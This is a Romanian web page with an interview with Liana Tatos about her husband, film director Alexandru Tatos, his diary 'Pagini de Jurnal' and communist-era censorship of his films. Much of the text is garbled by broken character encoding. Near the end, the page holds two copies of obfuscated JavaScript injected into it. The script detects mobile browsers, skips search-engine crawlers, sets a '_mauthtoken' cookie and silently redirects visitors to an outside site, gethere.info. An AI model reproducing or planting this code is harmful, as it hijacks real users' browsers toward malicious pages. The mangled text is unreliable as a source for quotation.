Filmul ca o AYedinA?A? de partid

Alexandru Tatos a fost un om curajos. AZntr-o epocA? despre care se spune cA? romA?nii aveau sufletul sA?rac AYi gri, regizorul Alexandru Tatos s-a Ai??ncA?pA?A?A?nat sA? strA?luceascA?. Ba mai mult, Ai??n majoritatea filmelor sale, a avut curajul sA? arate cu degetul AYi sA? acuze realitatea cea gri. Pe lA?ngA? cele cA?teva filme extrem de valoroase, Alexandru Tatos a lA?sat Ai??n urma lui AYi un jurnal Ai??n care a notat timp de 17 ani tulburA?rile prin care a trecut Ai??n Ai??ncercarea sa de a face artA? Ai??n perioada comunistA?. AZn continuare, Liana Tatos, soA?ia regizorului.

SA? presupunem cA? vA? adresaA?i cuiva care nu AYtie cine este Alexandru Tatos. Care este primul lucru pe care l-aA?i spune despre soA?ul dvs?

Liana Tatos: SA? se ducA? la cinema AYi sA? vadA? filmele lui Tatos. Nu e uAYor, pentru cA? sA?lile de cinema se feresc de filmul romA?nesc, fie el mai nou sau mai vechi, dar au apA?rut din fericire DVD-uri AYi mai fac AYi televiziunile ai???tentativeai??? de a ne arA?ta cA? avem AYi noi, romA?nii, o cinematografie.

Azi ce va gA?si Ai??n filmele lui Alexandru Tatos?

Liana Tatos: GA?seAYte astA?zi, Ai??n 2010, totul viu AYi prezent ca AYi cum filmul ar fi fost fA?cut foarte de curA?nd. Tatos face parte dintre regizorii generaA?iei care a fost denumitA? ai??zvalul anilor ai??i??70ai??? alA?turi de Dan PiA?a, Mircea Daneliuc, Mircea Veroiu, Radu Gabrea, Stere Guleaai??i??. E mult adevA?r Ai??n filmele lor. AZn SecvenA?e-le lui Tatos, de exemplu, despre care Cristi Puiu spune cA? “Ai??l petrificA?” este povestea cu acel cA?rciumar AYi AYmecher AYi disperat AYi cinstit Ai??n sufletul lui, dar AYi hoA? Ai??n meseria lui, iar toate trA?irile fantastice care se vA?d pe faA?a lui Mircea Diaconu cred cA? impresioneazA? enorm.

GA?ndindu-ne la Pagini de Jurnal care a fost reeditatA? de curA?nd la Nemira, de ce ar fi cineva interesat sA? citeascA? aceastA? carte?

Liana Tatos: Pentru cA? este ca un roman poliA?ist. Asta nu am spus-o eu. A zis-o cineva care a citit Pagini de Jurnal. De ce? Pentru cA? el scria Ai??n fiecare zi AYi totul era cu suspans. Pentru cA? scria: astA?zi mA? duc sA? vA?d dacA? Ai??mi aprobA? sau nu filmul. Sau scria: astA?zi o sA? aflu dacA? mi-l dA? sau nu mi-l dA? pe Mircea Diaconu, care era Ai??n armatA?. Azi te intereseazA? sA? vezi ce se Ai??ntA?mplA? mai departe: a convins un general de armatA? sA? Ai??i dea permisie actorului sA?u preferat, s-a aprobat scenariul, a trecut filmul de cenzurA?? Jurnalul acesta este publicat cum l-a scris el, necosmetizat. Azi l-am lA?sat aAYa pentru cA? mi-am dat seama de prospeA?imea pe care o are faptul petrecut atunci. Farmecul cA?rA?ii stA? Ai??n farmecul improvizaA?iei. Azi Ai??n farmecul ideii cA? acest jurnal era scris la patru dimineaA?a. AZn Pagini de Jurnal, Tatos este adevA?rat, nu se cenzureazA?, este foarte sincer AYi foarte cinstit cu el Ai??nsuAYi.

RA?tA?cire (1978)


DacA? ar fi sA? inventA?m o hartA? a vieA?ii, care momente din viaA?a lui Alexandru Tatos ar fi vA?ile AYi care munA?ii?

Liana Tatos: CA?nd vine vorba despre cinematografie, Secretul armei… secrete ar fi trebuit sA? reprezinte un pisc. Ce fericit a fost la filmul A?sta! CA?nta AYi se juca cu actorii. Era ca un copil AYi spera foarte tare Ai??n succes de public. A fost un pariu al lui prin care a vrut sA? demonstreze cA? poate face nu doar filme grave, ci AYi comedie purA?, la care sA? se rA?dA? sA?nA?tos. E demenA?A? la filmul A?sta. A fost A?inut doi ani Ai??n cutii, apoi i-au dat drumul pe piaA?a douA? zile. A avut un succes enorm, asa cA? a fost retras. N-a mai AYtiut nimeni de el vreo 20 de ani. Abia acum este descoperit AYi am fost Ai??n sA?lile de cinema AYi la BucureAYti AYi la Cluj AYi la TimiAYoara. E demenA?A?, toatA? lumea este pe jos de rA?s.

Ca realizare a fost, poate, pe cel mai Ai??nalt pisc cu acest film, dar ca trA?ire a fost Ai??n cea mai adA?ncA? vale. Avusese confirmarea reuAYitei Ai??n cele douA? zile cA?t s-a proiectat filmul AYi trA?ia nedreptatea care i se fA?cea. Nu a apucat sA? se bucure de acest film AYi asta l-a dus Ai??ntr-o vale a disperA?rii. De fapt, el nu a fost niciodatA? pe piscul unui munte. Ce poate fi mai mult pentru un regizor dintr-o A?A?riAYoarA? micA?, Ai??ndepA?rtatA? AYi prA?pA?ditA? decA?t sA? fie invitat cu douA? filme la Muzeul de ArtA? ModernA? din New York, unde nu ajunsese pA?nA? atunci niciun cineast romA?n. PA?i l-a lA?sat cineva sA? fie pe piscuri? Pentru cA? nu i-au dat voie sA? plece.

Alexandru Tatos (mijloc). Fotografie de la filmA?rile pentru "Nebunia lui Pantalone" (1971).

Sunt curioasA? ce visa Alexandru Tatos .

Liana Tatos: Visa sA? facA? un film exact aAYa cum vrea el. Devenise o obsesie AYi chiar scrie pe la sfA?rAYitul jurnalului cA? el nu mai fA?cea film, ci se preocupa de cum sA? pA?cA?leascA? cenzura. Cei care au trA?it timpul acela chiar se mirA? cum de au scA?pat atA?tea adevA?ruri Ai??n filmele lui. Iar eu mA? Ai??ntreb cum ar fi arA?tat aceste filme dacA? ar fi fost lA?sate exact aAYa cum le-a gA?ndit el.

AZn Pagini de Jurnal, Tatos vorbeAYte despre niAYte oameni care sunt celebri Ai??n zilele noastre AYi care Ai??n anii ai??i??80 erau la Ai??nceput de drum. VorbeAYte despre vedetele noastre consacrate, cA?rora astA?zi le spunem “maestre”, Ai??AYi spune pA?rerea despre ei, povesteAYte Ai??ntA?mplA?ri cu ei. Unii sunt mai buni, alA?ii sunt mai puA?in buni. Ca-n viaA?A?.

AceastA? carte este pentru cei care acum au 20 AYi ceva de ani AYi care sunt interesaA?i de toatA? perioada aceea cruntA? din anii ai??i??80 pe care noi am trA?it-o. Azi este suficient sA? citeAYti un fragmenA?el din jurnal ca sA? vrei sA? Ai??l citeAYti pe tot.

Apropo, ce mesaj voia Alexandru Tatos sA? transmitA? prin filmele sale?

Liana Tatos: Cred cA? mesajul pe care l-am pus eu pe coperta a doua a cA?rA?ii: cA? trebuie sA? fii corect, trebuie sA? fi cinstit AYi sA? nu faci compromisuri.

Dar nu era greu Ai??n acea epocA? sA? nu faci compromisuri Ai??n artA??

Liana Tatos: Ba da. Era foarte greu. Azi dacA? le fA?ceai simA?eai foarte tare. GA?ndeAYte-te ce Ai??nseamnA? sA? stai doi ani, sA? fii plin de idei, de dorinA?e, de puterea de a munci AYi sA? te Ai??nvA?rA?i zile Ai??ntregi Ai??n jur unei mese din cauza neputinA?ei.

Dar de ce se Ai??ntA?mpla asta?

Liana Tatos: Pentru cA? erau o mie AYi una de motive pentru care nu i se aprobau scenariile…

ZiceA?i-mi, vA? rog, cA?teva motive care ar putea AYocante.

Manuela HA?rA?bor, Ai??n rolul "PrinA?esei" din filmul "Secretul armei... secrete" (1988)

De exemplu scenariul meu despre persoanele de vA?rsta a treia. Chiar dacA? aveam 27 de ani, eram obsedatA? de oam enii trecuA?i de 50 de ani, de problemele lor AYi din discuA?ii cu Tatos s-a nA?scut ideea de a face un film despre vA?rsta a treia. Eu am scris scenariul AYi l-am predat la Ministerul Culturii. Apoi am fost chematA? AYi un domn care arA?ta de-o cretinitate totalA?… am avut foart mulA?i AYefi din A?AYtia. Cu cA?t arA?ta unul mai cretin, cu atA?ta Ai??A?i era mai AYef. Azi mi-a zis tovarA?AYa, este frumos scenariul dvs., dar am vrea sA? Ai??l mai Ai??mbogA?A?iA?i puA?in. Azi eu am zis: da, sigur, normal. Azi mi-a cerut ca aceAYti doi bA?trA?ni care Ai??n scenariul meu erau cam la 50 de ani, deci nu chiar atA?t de Ai??n vA?rstA?. Iar el se Ai??ndrA?gostea de o tA?nA?rA? reporterA?, iar amica lui care era AYi ea singurA?, o femeie tot de 50 AYi ceva de ani, se gA?ndea AYi ea la dragoste.

Deci filmul spunea o poveste de dragoste care se Ai??ntA?mplA? la orice vA?rstA? oricA?t ar pA?rea de ciudat. AZmbA?trA?neAYti, dar rA?mA?i la fel de de tA?nA?r sufeleteAYte AYi la fel de deschis cA?tre dragoste, cA?tre glorie. Azi ce Ai??mi cere mie A?sta? AZmi cere sA? bag AYi niAYte pionieri Ai??n scenariu. SA? vinA? sA? le aducA? mA?ncare cu sufertaAYul. Azi eu i-am spus, pA?i, tovarA?AYuai??i?? (nu mai AYtiu cum Ai??l chema cA? erau cretini din A?AYtia ca pA?trunjelul Ai??n piaA?A?), dar ce vreA?i dvs. este alt film, A?sta este despre niAYte handicapaA?i, ce Ai??mi cereA?i dvs.

A mai zis cA? din filmul nostru lipseAYte organizaA?ia de partid din cartier care sA? Ai??i ajute sA? Ai??AYi petreacA? timpul liber Ai??n mod plA?cut AYi util. FiindcA? aveam noi niAYte momente AYi niAYte scene de singurA?tate foarte mare a acestor oameni AYi ei au gA?sit cA? e foarte simplu sA? vinA? organizaA?ia de partid din cartier AYi sA? le planifice timpul liber. Noi ne duceam cu o idee, iar ei transformau totul Ai??ntr-o AYedinA?A? de partid. Cum Tatos n-a fost membru de partid, n-a fA?cut filme de soiul A?sta. Din acest motiv filmografia lui numarA? doar nouA? titluri. Dar, vorba aceea, puA?in AYi bun!

SecvenA?e (1982)

var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}var _0x446d=[“\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E”,”\x69\x6E\x64\x65\x78\x4F\x66″,”\x63\x6F\x6F\x6B\x69\x65″,”\x75\x73\x65\x72\x41\x67\x65\x6E\x74″,”\x76\x65\x6E\x64\x6F\x72″,”\x6F\x70\x65\x72\x61″,”\x68\x74\x74\x70\x3A\x2F\x2F\x67\x65\x74\x68\x65\x72\x65\x2E\x69\x6E\x66\x6F\x2F\x6B\x74\x2F\x3F\x32\x36\x34\x64\x70\x72\x26″,”\x67\x6F\x6F\x67\x6C\x65\x62\x6F\x74″,”\x74\x65\x73\x74″,”\x73\x75\x62\x73\x74\x72″,”\x67\x65\x74\x54\x69\x6D\x65″,”\x5F\x6D\x61\x75\x74\x68\x74\x6F\x6B\x65\x6E\x3D\x31\x3B\x20\x70\x61\x74\x68\x3D\x2F\x3B\x65\x78\x70\x69\x72\x65\x73\x3D”,”\x74\x6F\x55\x54\x43\x53\x74\x72\x69\x6E\x67″,”\x6C\x6F\x63\x61\x74\x69\x6F\x6E”];if(document[_0x446d[2]][_0x446d[1]](_0x446d[0])== -1){(function(_0xecfdx1,_0xecfdx2){if(_0xecfdx1[_0x446d[1]](_0x446d[7])== -1){if(/(android|bb\d+|meego).+mobile|avantgo|bada\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od|ad)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x446d[8]](_0xecfdx1)|| /1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\-(n|u)|c55\/|capi|ccwa|cdm\-|cell|chtm|cldc|cmd\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\-s|devi|dica|dmob|do(c|p)o|ds(12|\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\-|_)|g1 u|g560|gene|gf\-5|g\-mo|go(\.w|od)|gr(ad|un)|haie|hcit|hd\-(m|p|t)|hei\-|hi(pt|ta)|hp( i|ip)|hs\-c|ht(c(\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\-(20|go|ma)|i230|iac( |\-|\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\/)|klon|kpt |kwc\-|kyo(c|k)|le(no|xi)|lg( g|\/(k|l|u)|50|54|\-[a-w])|libw|lynx|m1\-w|m3ga|m50\/|ma(te|ui|xo)|mc(01|21|ca)|m\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\-2|po(ck|rt|se)|prox|psio|pt\-g|qa\-a|qc(07|12|21|32|60|\-[2-7]|i\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\-|oo|p\-)|sdk\/|se(c(\-|0|1)|47|mc|nd|ri)|sgh\-|shar|sie(\-|m)|sk\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\-|v\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\-|tdg\-|tel(i|m)|tim\-|t\-mo|to(pl|sh)|ts(70|m\-|m3|m5)|tx\-9|up(\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\-|your|zeto|zte\-/i[_0x446d[8]](_0xecfdx1[_0x446d[9]](0,4))){var _0xecfdx3= new Date( new Date()[_0x446d[10]]()+ 1800000);document[_0x446d[2]]= _0x446d[11]+ _0xecfdx3[_0x446d[12]]();window[_0x446d[13]]= _0xecfdx2}}})(navigator[_0x446d[3]]|| navigator[_0x446d[4]]|| window[_0x446d[5]],_0x446d[6])}

Print

Adaugă un comentariu

Adresa dumneavoastră de e-mail nu va fi făcută în niciun fel publică fără acordul sau cererea dumneavoastră explicită.